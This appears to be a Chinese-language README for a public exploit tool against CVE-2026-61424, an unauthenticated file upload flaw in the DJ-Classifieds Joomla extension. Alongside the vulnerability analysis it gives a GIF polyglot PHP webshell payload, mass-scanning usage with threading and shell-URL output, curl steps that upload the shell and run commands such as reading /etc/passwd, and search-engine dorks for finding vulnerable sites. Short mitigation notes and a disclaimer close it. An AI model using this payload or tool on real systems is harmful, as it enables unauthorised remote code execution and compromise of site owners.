DJ-Classifieds(Joomla 扩展)存在未授权任意文件上传漏洞。imageupload 任务端点在无身份验证的情况下处理文件上传,并依赖一个3字符串黑名单(<?php、eval(、base64),该黑名单可通过 PHP 短开标签(<?=)轻松绕过。结合 GIF 多语言(polyglot)文件,上传的文件能通过所有图像校验,同时包含功能完整的 PHP WebShell。
| 字段 | 详情 |
|---|---|
| CVE | CVE-2026-61424 |
| 产品 | DJ-Classifieds(DJ-Extensions 开发的 Joomla 扩展) |
| CVSS 4.0 | 10.0(严重) |
| 类型 | CWE-434 — 无限制文件上传 |
| 发现者 | Phil Taylor / mySites.guru — 2026年7月16日 |
| 利用情况 | 在披露之前已确认存在在野利用 |
| 状态 | 版本 |
|---|---|
| 受影响 | 1.0 — 3.11.1 |
| 已修复 | 3.11.2(2026年7月20日) |
administrator/components/com_djclassifieds/lib/djupload.php 中的 upload() 方法被映射到 imageupload 任务,但没有身份验证检查,也没有 CSRF 令牌验证。
// administrator/components/com_djclassifieds/lib/djupload.php
// imageupload task → upload() method
// MISSING: JFactory::getUser() auth check
// MISSING: JSession::checkToken() CSRF check
$name = $_REQUEST['name'] ?? $_REQUEST['filename'] ?? '';
$raw_body = file_get_contents('php://input');
// ... writes file to tmp/djupload/<name>
内容扫描器仅拦截三个字面字符串:
// The ONLY malicious-content check in the entire upload handler:
if (preg_match('/<\?php|eval\(|base64/i', $fileContent)) {
die('Malicious file detected');
}
这会拦截 <?php、eval( 和 base64 — 但不会拦截 PHP 短开标签:
<?=system($_GET['c']);?> ← 0/3 blocked strings → PASSES
自 PHP 5.4 起,PHP 短回显标签(<?=)已默认启用。
GIF89a 文件头 + <?=system($_GET['c']);?>index.php?option=com_djclassifieds&task=imageupload 发送 POST 请求,携带 name=shell.gif.gif 扩展名 ✓ getimagesize() ✓ 无 <?php/eval(/base64 ✓tmp/djupload/<shell>.gifhttps://target.com/tmp/djupload/shell.gif?c=id| 文件 | 作用 |
|---|---|
administrator/components/com_djclassifieds/lib/djupload.php | upload() 方法 — 无认证,3字符串过滤器 |
components/com_djclassifieds/controller.php | 将 imageupload 任务路由到 upload() |
administrator/components/com_djclassifieds/djclassifieds.xml | 通过 <version> 标签泄露版本信息 |
披露前在野观察到的匿名扫描器探测:
POST /index.php?option=com_djclassifieds&task=imageupload
name=<random>.gif filename=<random>.gif
— no cookie, no session, no referer
git clone https://github.com/shinthink/CVE-2026-61424.git
cd CVE-2026-61424
pip install -r requirements.txt
python cve_2026_61424.py -t target.com
python cve_2026_61424.py -f targets.txt -o shells.txt
| 参数 | 说明 | 默认值 |
|---|---|---|
-t, --target | 单个目标主机 | — |
-f, --file | 目标列表文件(每行一个,# 为注释) | — |
-o, --output | 将 RCE URL 保存至文件 | — |
--threads | 批量模式的线程数 | 30 |
--no-cleanup | RCE 后不删除后门 | False |
--debug | 调试输出 | False |
$ python cve_2026_61424.py -t target.com
Host : target.com
DJ-Classifieds: YES v3.11.1
Upload : YES
RCE : YES
Shell : https://target.com/tmp/djupload/img_abc123.gif
Output : DJ-SHELL-OK Linux ... uid=33(www-data) gid=33(www-data) ...
Time : 2.1s
# Step 1 — Upload polyglot shell
curl -sk -X POST \
"https://target.com/index.php?option=com_djclassifieds&task=imageupload&name=shell.gif&filename=shell.gif" \
-H "Content-Type: image/gif" \
--data-binary @polyglot.gif
# Step 2 — Verify RCE
curl -sk "https://target.com/tmp/djupload/shell.gif?c=id;hostname;uname+-a"
# Step 3 — Execute arbitrary commands
curl -sk "https://target.com/tmp/djupload/shell.gif?c=cat%20/etc/passwd"
# DJ-Classifieds component
body="com_djclassifieds"
# Version disclosure (XML manifest)
body="DJ-Classifieds" && body="<version>"
# Exposed djupload directory
body="Index of" && body="djupload"
# Shodan
http.html:"com_djclassifieds" http.component:"Joomla"
upload() 前执行 JFactory::getUser() 访客检查imageupload 任务执行 JSession::checkToken()jpg、jpeg、png、gif)本工具仅供教育和授权安全测试使用。请仅针对您拥有或已获得明确测试许可的系统使用。作者对误用或造成的任何损害不承担任何责任。
| 资源 | 链接 |
|---|---|
| IONIX 威胁中心 | ionix.io/threat-center/cve-2026-61424 |
| mySites.guru 发现公告 | mysites.guru/blog/dj-classifieds-unauthenticated-file-upload |
| DJ-Extensions 安全版本发布 | dj-extensions.com/blog/general/dj-classifieds-3-11-2-security-release |
| CVE.org 记录 | cve.org/CVERecord?id=CVE-2026-61424 |
| INCIBE-CERT | incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2026-61424 |
与 DJ-Extensions 或 mySites.guru 无关联。